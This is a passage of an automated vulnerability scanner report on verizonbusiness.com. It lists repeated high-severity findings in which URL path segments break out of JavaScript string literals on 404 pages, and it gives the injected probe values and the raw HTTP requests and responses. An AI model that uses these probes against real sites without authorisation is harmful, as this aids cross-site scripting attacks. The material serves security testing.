GET /resources9e72c'%3bfb035a42e8e/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:05:46 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40750
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources9e72c';fb035a42e8e/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.841. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e57e'%3b3d2eae4ffdb was submitted in the REST URL parameter 2. This input was echoed as 4e57e';3d2eae4ffdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers4e57e'%3b3d2eae4ffdb/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40362
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:06:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers4e57e';3d2eae4ffdb/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.842. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4098e"%3ba3c6992b4d0 was submitted in the REST URL parameter 2. This input was echoed as 4098e";a3c6992b4d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers4098e"%3ba3c6992b4d0/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40360
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers4098e";a3c6992b4d0/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.f
...[SNIP]...

1.843. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 584a4"%3b2cdfe1c57c0 was submitted in the REST URL parameter 3. This input was echoed as 584a4";2cdfe1c57c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf584a4"%3b2cdfe1c57c0 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40360
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:06:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf584a4";2cdfe1c57c0";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.844. http://www.verizonbusiness.com/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb1da'%3baa6ecfa86e4 was submitted in the REST URL parameter 3. This input was echoed as eb1da';aa6ecfa86e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdfeb1da'%3baa6ecfa86e4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:06:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40360
Date: Wed, 17 Nov 2010 00:06:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:06:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_enabling-revolutionary-cross-channel-trends-retail_en_xg.pdfeb1da';aa6ecfa86e4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.845. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b2c"%3b79829a858e4 was submitted in the REST URL parameter 1. This input was echoed as 57b2c";79829a858e4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources57b2c"%3b79829a858e4/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40704
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources57b2c";79829a858e4/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM
...[SNIP]...

1.846. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e738'%3b84d75a5cf19 was submitted in the REST URL parameter 1. This input was echoed as 9e738';84d75a5cf19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources9e738'%3b84d75a5cf19/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40706
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources9e738';84d75a5cf19/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.847. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43b16'%3bec0f14bd8cf was submitted in the REST URL parameter 2. This input was echoed as 43b16';ec0f14bd8cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers43b16'%3bec0f14bd8cf/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:18:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40314
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers43b16';ec0f14bd8cf/wp_need-standards-in-retail-it_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.848. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4f3"%3b254d010b133 was submitted in the REST URL parameter 2. This input was echoed as 6e4f3";254d010b133 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers6e4f3"%3b254d010b133/wp_need-standards-in-retail-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers6e4f3";254d010b133/wp_need-standards-in-retail-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.849. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15549"%3bf58832f9097 was submitted in the REST URL parameter 3. This input was echoed as 15549";f58832f9097 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf15549"%3bf58832f9097 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
rf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf15549";f58832f9097";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.850. http://www.verizonbusiness.com/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8a3c'%3b2c739d10b11 was submitted in the REST URL parameter 3. This input was echoed as c8a3c';2c739d10b11 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdfc8a3c'%3b2c739d10b11 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40316
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_need-standards-in-retail-it_en_xg.pdfc8a3c';2c739d10b11'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.851. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad41a'%3b909ec3bb87e was submitted in the REST URL parameter 1. This input was echoed as ad41a';909ec3bb87e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesad41a'%3b909ec3bb87e/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40762
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesad41a';909ec3bb87e/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.852. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4c70"%3b37455aea54 was submitted in the REST URL parameter 1. This input was echoed as e4c70";37455aea54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese4c70"%3b37455aea54/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
